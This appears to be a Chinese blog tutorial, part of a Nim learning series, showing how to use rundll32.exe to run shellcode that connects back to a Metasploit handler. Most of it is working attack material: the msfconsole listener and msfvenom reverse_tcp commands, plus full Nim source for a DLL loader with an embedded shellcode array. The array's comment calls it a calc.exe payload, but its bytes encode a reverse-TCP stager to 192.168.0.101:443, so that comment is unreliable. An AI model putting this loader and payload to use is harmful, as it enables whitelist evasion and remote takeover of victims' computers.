白名单rundll32加载shellcode上线metasploit(nim学习系列)
白名单 rundll32 加载 shellcode 上线 metasploit
监听 metasploit
msfconsole -x "use exploits/multi/handler; set lhost 192.168.0.101; set lport 443; set payload windows/x64/meterpreter/reverse_tcp; exploit"
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=443 -f csharp
WaitForSingleObject
这里主要学习通过“WaitForSingleObject”函数来等待执行shellcode的线程,否则一溜烟就执行完毕,rundll32.exe进程跟着退出,反弹metasploit失败。
DWORD WaitForSingleObject(
[in] HANDLE hHandle,
[in] DWORD dwMilliseconds
);
hHandle 表示对象句柄,这里指向我们的shellcode。
dwMilliseconds 表示超时间隔(以毫秒为单位)。如果 dwMilliseconds 为 INFINITE,则仅当发出对象信号时,该函数才会返回。
这里要在导出函数里创建一个线程A,然后在线程A中再创建一个线程B,用于执行shellcode。同时都使用“WaitForSingleObject”函数等待对象信号。
poc.nim
编译:
nim c --app:lib --nomain --passL:-static-libgcc --cpu:amd64 poc.nim
执行:
rundll32.exe poc.dll,test
import winim/lean
proc NimMain() {.cdecl, importc.}
proc shellcodeLoader() =
when defined(windows):
# https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
if defined(amd64):
# msfvenom -p windows/x64/exec CMD=calc.exe -f csharp, then modified for Nim arrays
var shellcode: array[510, byte] = [
byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x48,0x31,
0xd2,0x65,0x48,0x8b,0x52,0x60,0x56,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,
0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0x8b,0x48,0x18,
0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,
0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0x0d,0xac,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x41,0x58,0x48,0x01,0xd0,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,
0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x01,0xbb,
0xc0,0xa8,0x00,0x65,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,
0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,
0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x6a,0x0a,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,
0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,
0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,
0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,
0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,
0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,
0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,
0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,
0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,
0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,
0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,
0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,
0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,
0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,
0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5]
let tProcess = GetCurrentProcessId()
var pHandle: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)
let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)
let shellcodeAddress = cast[PTP_WAIT_CALLBACK](rPtr)
var aHandle = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](shellcodeAddress), cast[LPVOID](nil), 0, nil)
discard WaitForSingleObject(aHandle, INFINITE)
discard CloseHandle(aHandle)
proc test(): void {.cdecl, exportc, dynlib.} =
var aHandle = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](shellcodeLoader), cast[LPVOID](nil), 0, nil)
discard WaitForSingleObject(aHandle, INFINITE)
discard CloseHandle(aHandle)
proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
NimMain()
case fdwReason:
of DLL_PROCESS_ATTACH:
discard
of DLL_PROCESS_DETACH:
discard
of DLL_THREAD_ATTACH:
discard
of DLL_THREAD_DETACH:
discard
else:
discard
return true
引用
https://learn.microsoft.com/zh-cn/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject
https://learn.microsoft.com/zh-cn/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread
https://www.cnblogs.com/henry666/p/17429771.html